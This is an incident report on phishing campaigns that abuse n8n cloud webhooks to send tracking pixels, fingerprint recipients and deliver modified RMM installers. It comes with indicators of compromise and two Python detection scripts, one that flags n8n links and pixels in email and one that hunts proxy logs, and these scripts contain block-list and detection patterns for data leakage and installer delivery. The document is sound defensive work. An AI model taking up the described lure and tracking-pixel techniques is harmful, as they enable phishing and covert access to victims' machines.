Full Report
Threat actors have been observed weaponizing n8n, a popular artificial intelligence (AI) workflow automation platform, to facilitate sophisticated phishing campaigns and deliver malicious payloads or fingerprint devices by sending automated emails. "By leveraging trusted infrastructure, these attackers bypass traditional security filters, turning productivity tools into delivery
Analysis Summary
# Incident Report: Abuse of n8n Automation Webhooks for Malware Delivery
## Executive Summary
Threat actors have weaponized the n8n AI workflow automation platform to run phishing and device-fingerprinting campaigns. Because the lure links point at legitimate `*.app.n8n.cloud` tenant subdomains, which carry a good domain reputation, they pass reputation-based email filtering and are used to deliver modified Remote Monitoring and Management (RMM) tools. Campaign volume has surged: a 686% increase in malicious activity was observed between January 2025 and March 2026.
## Incident Details
- **Discovery Date:** April 15, 2026 (Public Report by Cisco Talos)
- **Incident Date:** October 2025 – Present
- **Affected Organization:** Multiple; users of n8n and recipients of phishing emails
- **Sector:** Technology / AI Automation
- **Geography:** Global
## Timeline of Events
### Initial Access
- **Date/Time:** October 2025 (Earliest identified activity)
- **Vector:** Phishing via Email
- **Details:** Attackers send emails that either link to n8n-hosted webhook URLs, usually disguised as a "shared document", or embed an invisible tracking pixel whose source is such a URL, so the webhook fires as soon as the mail client renders the message.
### Lateral Movement
- **Details:** Attackers utilize modified versions of legitimate RMM tools (Datto and ITarian Endpoint Management) to maintain access and potentially move laterally within compromised environments.
### Data Exfiltration/Impact
- **Details:** Device fingerprinting (collecting IP, email, and browser data) and the establishment of persistent remote access to victim workstations.
### Detection & Response
- **How it was discovered:** Cisco Talos researchers observed a sharp rise (686% between January 2025 and March 2026) in malicious email traffic originating from or linking to n8n infrastructure.
- **Response actions taken:** Threat intelligence published to alert organizations; research highlights the need for better monitoring of low-code/no-code platforms.
## Attack Methodology
- **Initial Access:** Phishing emails containing n8n webhook URLs.
- **Persistence:** Installation of modified RMM tools (Datto/ITarian) as services.
- **Defense Evasion:** Links on trusted `*.app.n8n.cloud` tenant subdomains pass reputation-based email filters; CAPTCHA gates placed in front of the payload keep automated URL scanners and sandboxes from reaching it.
- **Discovery:** Device fingerprinting via invisible tracking pixels embedded in emails.
- **Lateral Movement:** Facilitated through RMM tool capabilities.
- **Exfiltration:** Tracking parameters (recipient email address, device and browser details) sent as query-string parameters in HTTP GET requests to attacker-controlled webhooks.
- **Impact:** Persistent remote access through modified RMM installers (MSI/EXE) that run as services.
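The lure described in this list is checkable at the mail gateway: a "shared document" link and an invisible pixel that both point at an n8n webhook, with the recipient's address carried in the pixel's query string. The Python below is an added example written for this summary, not code from Cisco Talos or from the n8n project. The message, the tenant hostname `tenant-a1b2.app.n8n.cloud` and the query-parameter names `e`, `c` and `doc` are constructed for the demo; only the `*.app.n8n.cloud` suffix comes from the report.

```python
"""Flag n8n webhook links and tracking pixels in a phishing email.

Added example for this report; it is not code from Cisco Talos or the n8n
project. It parses the HTML part of a message, keeps every anchor or image
whose target is an n8n cloud hostname, and pulls out the tracking parameters
that such URLs carry. The message and tenant hostname below are constructed;
the query-parameter names are illustrative assumptions.
"""
import email
import re
from email import policy
from html.parser import HTMLParser
from urllib.parse import parse_qsl, urlsplit

N8N_SUFFIXES = (".app.n8n.cloud", ".n8n.cloud")
EMAIL_RE = re.compile(r"^[^@\s]+@[^@\s]+\.[^@\s]+$")


def is_n8n_host(host):
    """True for any tenant subdomain under n8n's cloud service."""
    host = (host or "").lower()
    return any(host.endswith(s) for s in N8N_SUFFIXES)


class _LinkCollector(HTMLParser):
    """Record every <a href> and <img src> together with its attributes."""

    def __init__(self):
        super().__init__()
        self.links = []  # (kind, url, attrs)

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "a" and a.get("href"):
            self.links.append(("anchor", a["href"], a))
        elif tag == "img" and a.get("src"):
            self.links.append(("image", a["src"], a))


def _is_hidden_pixel(attrs):
    """1x1/0x0 or CSS-hidden images are tracking pixels, not content."""
    dims = (attrs.get("width") or "", attrs.get("height") or "")
    style = (attrs.get("style") or "").replace(" ", "").lower()
    return (all(d.strip('"px') in ("0", "1") for d in dims)
            or "display:none" in style or "visibility:hidden" in style)


def analyze_html(html):
    """Return one finding per link that points at n8n infrastructure."""
    collector = _LinkCollector()
    collector.feed(html)
    findings = []
    for kind, url, attrs in collector.links:
        parts = urlsplit(url)
        if not is_n8n_host(parts.hostname):
            continue  # only n8n-hosted targets are of interest here
        params = dict(parse_qsl(parts.query))
        findings.append({
            "kind": kind,
            "host": parts.hostname.lower(),
            "webhook": "/webhook" in parts.path,
            "tracking_pixel": kind == "image" and _is_hidden_pixel(attrs),
            # Any parameter value shaped like an address identifies the recipient.
            "leaked_email": next((v for v in params.values() if EMAIL_RE.match(v)), None),
            "params": params,
        })
    return findings


def analyze_message(raw):
    """Parse a raw RFC 5322 message and scan its preferred HTML body."""
    msg = email.message_from_string(raw, policy=policy.default)
    body = msg.get_body(preferencelist=("html",))
    return analyze_html(body.get_content()) if body is not None else []


# Constructed sample: a "shared document" lure with a click link and a 1x1 pixel.
SAMPLE_EMAIL = """\
From: "Shared Drive" <noreply@example.invalid>
To: alice@example.invalid
Subject: Document shared with you
MIME-Version: 1.0
Content-Type: text/html; charset="utf-8"

<html><body>
<p>A document has been shared with you.</p>
<a href="https://tenant-a1b2.app.n8n.cloud/webhook/share?doc=Q3-Report">Open shared document</a>
<img src="https://tenant-a1b2.app.n8n.cloud/webhook/open?e=alice%40example.invalid&c=1" width="1" height="1">
<a href="https://example.invalid/unsubscribe">Unsubscribe</a>
</body></html>
"""

if __name__ == "__main__":
    for finding in analyze_message(SAMPLE_EMAIL):
        print(finding)
```

Run against the sample, the anchor is reported as a webhook link and the image as a hidden tracking pixel that leaks `alice@example.invalid`; the unsubscribe link on a non-n8n host is ignored. The suffix match deliberately covers every tenant subdomain, so in an organization that legitimately uses n8n the gateway rule should exempt the tenant hostnames it owns rather than the whole zone.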
## Impact Assessment
- **Financial:** Not disclosed, but associated with high risks of ransomware via RMM access.
- **Data Breach:** Compromise of user metadata and potential full system access.
- **Operational:** Potential for complete takeover of infected endpoints.
- **Reputational:** Abuse of n8n’s brand/infrastructure to facilitate attacks.
## Indicators of Compromise
- **Network indicators:**
- `[unique_subdomain].app.n8n[.]cloud`
- Outbound connections to Datto or ITarian RMM relay infrastructure from hosts that are not part of a sanctioned RMM deployment (the vendor infrastructure itself is legitimate; the anomaly is an agent checking in from a host that should not have one).
- **File indicators:**
- Malicious `.msi` or `.exe` installers delivered via n8n links.
- **Behavioral indicators:**
- Web requests to n8n webhook URLs issued by the mail client as soon as a message is rendered (the tracking pixel firing), before any user click.
- Unexpected CAPTCHA prompts appearing after clicking "shared document" links.
## Response Actions
- **Containment measures:** Blocking traffic to suspicious n8n subdomains.
- **Eradication steps:** Removal of unauthorized RMM software from endpoints.
- **Recovery actions:** Resetting credentials for users who interacted with the phishing links.
## Lessons Learned
- **Key takeaways:** Trusted "Low-Code/No-Code" platforms are highly attractive to attackers because their infrastructure is often pre-whitelisted by security vendors.
- **What could have been done better:** Earlier detection of the webhook behavior being abused: an n8n workflow can fetch HTML or JavaScript from an external host and return it in the webhook response, so the trusted n8n domain ends up acting as a proxy in front of the real malware host.
## Recommendations
- **Prevention:** Restrict or DNS-sinkhole automation-platform domains such as `*.app.n8n.cloud` unless a documented business need exists; where n8n is in use, allow only the tenant subdomains the organization owns.
- **Detection:** Monitor for outbound HTTP GET requests from mail clients (as opposed to browsers) to cloud automation domains; a mail client fetching a webhook at message-open time is the tracking pixel firing.
- **Email Security:** Configure email gateways to follow and inspect link destinations even when the link host has a high reputation such as `*.app.n8n.cloud`, since the webhook response can carry content pulled from an external host.
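To turn the Indicators of Compromise and the Detection recommendation above into something that runs over proxy telemetry, here is an added example written for this summary; it is not Cisco Talos or n8n code. It assumes JSON-lines proxy records with the field names shown, treats a mail-client user agent as the signal for a pixel fetch on message open, and uses a placeholder RMM relay domain (`rmm-relay.example`) plus a sanctioned-host set; substitute the relay hostnames your RMM vendor documents and your own asset inventory. The log records are constructed.

```python
"""Hunt for the n8n webhook abuse pattern in web-proxy logs.

Added example for this report, not Cisco Talos or n8n code. It applies the
behavioural, file and network indicators above to JSON-lines proxy records and
returns findings plus a block list of the n8n tenant hostnames involved. The
log records are constructed; the field names, mail-client user-agent markers,
RMM relay domain and sanctioned-host list are assumptions to adapt to your
environment (take RMM relay hostnames from the vendor's documentation).
"""
import json
import re
from urllib.parse import parse_qsl, urlsplit

N8N_SUFFIXES = (".app.n8n.cloud", ".n8n.cloud")
MAIL_CLIENT_UA = ("microsoft office", "outlook", "thunderbird", "apple mail")
INSTALLER_TYPES = {"application/x-msi", "application/x-msdownload",
                   "application/octet-stream"}
EMAIL_RE = re.compile(r"[^@\s]+@[^@\s]+\.[^@\s]+")
RMM_RELAY_DOMAINS = ("rmm-relay.example",)   # placeholder, see docstring
SANCTIONED_RMM_HOSTS = {"10.0.1.50"}         # assumed asset inventory


def is_n8n_host(host):
    """True for any tenant subdomain under n8n's cloud service."""
    return any(host.endswith(s) for s in N8N_SUFFIXES)


def inspect(rec):
    """Return the names of every rule a single proxy record trips."""
    parts = urlsplit(rec["url"])
    host = (parts.hostname or "").lower()
    hits = []
    if is_n8n_host(host):
        ua = rec.get("user_agent", "").lower()
        # A mail client (not a browser) fetching a webhook = pixel firing on open.
        if "/webhook" in parts.path and any(m in ua for m in MAIL_CLIENT_UA):
            hits.append("n8n_webhook_fetched_by_mail_client")
        # Recipient address carried in the query string = fingerprinting exfil.
        if any(EMAIL_RE.fullmatch(v) for _, v in parse_qsl(parts.query)):
            hits.append("email_address_in_n8n_query")
        # Executable installers served from the webhook domain.
        ctype = rec.get("content_type", "").split(";")[0].strip().lower()
        if parts.path.lower().endswith((".msi", ".exe")) or ctype in INSTALLER_TYPES:
            hits.append("installer_served_from_n8n")
    elif (any(host == d or host.endswith("." + d) for d in RMM_RELAY_DOMAINS)
            and rec["src_ip"] not in SANCTIONED_RMM_HOSTS):
        # RMM agent check-ins from a host that should not be running an agent.
        hits.append("rmm_relay_traffic_from_unsanctioned_host")
    return hits


def hunt(log_text):
    """Scan JSON-lines proxy log text; return (findings, n8n hosts to block)."""
    findings, blocklist = [], set()
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = json.loads(line)
        hits = inspect(rec)
        if not hits:
            continue
        findings.append({"ts": rec["ts"], "src_ip": rec["src_ip"],
                         "url": rec["url"], "rules": hits})
        host = (urlsplit(rec["url"]).hostname or "").lower()
        if is_n8n_host(host):
            blocklist.add(host)  # candidate for the containment block list
    return findings, sorted(blocklist)


# Constructed records: pixel fetch on open, lure click, MSI download, then an
# RMM check-in from the victim and one from a sanctioned host.
SAMPLE_LOG = """\
{"ts": "2026-03-02T09:14:03Z", "src_ip": "10.0.2.17", "method": "GET", "url": "https://tenant-a1b2.app.n8n.cloud/webhook/open?e=alice%40example.invalid&c=1", "status": 200, "content_type": "image/gif", "user_agent": "Microsoft Office/16.0 (Windows NT 10.0; Microsoft Outlook 16.0.17328)"}
{"ts": "2026-03-02T09:16:41Z", "src_ip": "10.0.2.17", "method": "GET", "url": "https://tenant-a1b2.app.n8n.cloud/webhook/share?doc=Q3-Report", "status": 200, "content_type": "text/html; charset=utf-8", "user_agent": "Mozilla/5.0 (Windows NT 10.0) Chrome/123.0"}
{"ts": "2026-03-02T09:17:05Z", "src_ip": "10.0.2.17", "method": "GET", "url": "https://tenant-a1b2.app.n8n.cloud/webhook/dl/Q3-Report.msi", "status": 200, "content_type": "application/x-msi", "user_agent": "Mozilla/5.0 (Windows NT 10.0) Chrome/123.0"}
{"ts": "2026-03-02T09:20:00Z", "src_ip": "10.0.2.17", "method": "POST", "url": "https://agent.rmm-relay.example/checkin", "status": 200, "content_type": "application/json", "user_agent": "rmm-agent/1.0"}
{"ts": "2026-03-02T09:20:30Z", "src_ip": "10.0.1.50", "method": "POST", "url": "https://agent.rmm-relay.example/checkin", "status": 200, "content_type": "application/json", "user_agent": "rmm-agent/1.0"}
{"ts": "2026-03-02T09:21:00Z", "src_ip": "10.0.2.18", "method": "GET", "url": "https://www.example.invalid/news", "status": 200, "content_type": "text/html", "user_agent": "Mozilla/5.0"}
"""

if __name__ == "__main__":
    found, block = hunt(SAMPLE_LOG)
    for f in found:
        print(f["ts"], f["src_ip"], ",".join(f["rules"]), f["url"])
    print("block:", block)
```

On the sample this yields three findings from the victim host 10.0.2.17 (pixel fetch by Outlook carrying the recipient address, an MSI served from the webhook, and an RMM check-in from a host with no sanctioned agent), skips the click on the lure itself because nothing about that request is anomalous on its own, and proposes `tenant-a1b2.app.n8n.cloud` for blocking. Two tuning notes: the `application/octet-stream` rule is noisy where n8n is used legitimately and should be scoped to unowned tenants, and where mail-server delivery logs are available the pixel rule is stronger if the fetch is also required to fall within seconds of the message's arrival.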